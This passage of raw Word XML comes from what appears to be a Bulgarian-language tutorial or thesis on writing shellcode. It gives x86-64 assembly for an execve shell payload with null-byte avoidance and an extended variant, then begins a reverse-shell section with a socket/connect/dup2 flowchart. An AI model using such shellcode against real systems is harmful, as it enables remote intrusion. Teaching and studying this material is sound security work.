      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $60, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edi, %edi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Ref2190879"/>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve">1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>: Класически шел (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell.s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Програмата представлява подготовка за извикване на системна функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>execve()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">, последвана от нейното извикване и функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>exit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> за всеки случай. Така асемблирана, е 41 байта. За да няма нулеви, трябва да се нулира терминиращият байт на аргумента за </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>execve()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и да се използва xor трикът </w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:t xml:space="preserve">(описан в </w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">т. </w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref2190388 \r \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>2.4.1</w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Ако се опитаме да заменим програмата с друга е възможно да възникне проблем. Някои програми очакват като първи аргумент тяхното име (например ls). Затова кодът може да бъде разширен до:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>.global _start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>.text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>_start:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>jmp next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>addr:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.space 8, 0xff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>addr_eol:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.space 8, 0xff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.ascii "/bin/ls"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sh_eol:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 0xff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>next:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorq %rax, %rax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># stack is executable, i can do this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb %al, sh_eol(%rip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>leaq sh(%rip), %rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># init char *argvp[]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movq %rax, addr_eol(%rip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movq %rdi, addr(%rip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>leaq addr(%rip), %rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edx, %edx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_execve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $59, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $60, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edi, %edi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Ref2190886"/>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARAB</w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve">IC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>Разширен вариант на класически шел</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Така вече кодът става 77 байта, близо двойно повече. Допълнителният размер се състои от 16 байта нулеви указатели и инструкции за тяхното нулиране. На 32 битова машина, те биха били по-къси и общият размер по-малък, но пак има голямо увеличение. Това разширение не е необходимо за програми като /bin/sh, които не искат параметри.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_o4kcn99xxix2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="66" w:name="_Ref2190635"/>
      <w:bookmarkStart w:id="67" w:name="_Toc3540772"/>
      <w:bookmarkEnd w:id="65"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Класическият </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve">shell е добра основа за надграждане. Друг класически подход е reverse shell. Неговата идея е, че шелът се контролира отдалечено. Затова трябва установяване на отдалечена връзка и копиране на сокета (socket) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">на стандартните вход и изход. Процесът е по-продължителен и неговите части са представени на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref2190444 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
          <w:highlight w:val="magenta"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reverse shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E60F7" w:rsidRPr="00112660" w:rsidRDefault="005E60F7" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="001E0963" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3800475</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>9525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930"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875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>| socket() |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">      |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">      v</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>|connect() |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">      |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">      v</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>|  dup2()  |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">      |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">      v</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>|  dup2()  |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">      |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">      v</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>+----------+</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
                            </w:pPr>
                            <w:r>
                              <w:t>|  dup2()  |</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00875CB1" w:rsidRDefault="00875CB1" w:rsidP="001E0963">
                            <w:pPr>
                              <w:pStyle w:val="figures"/>
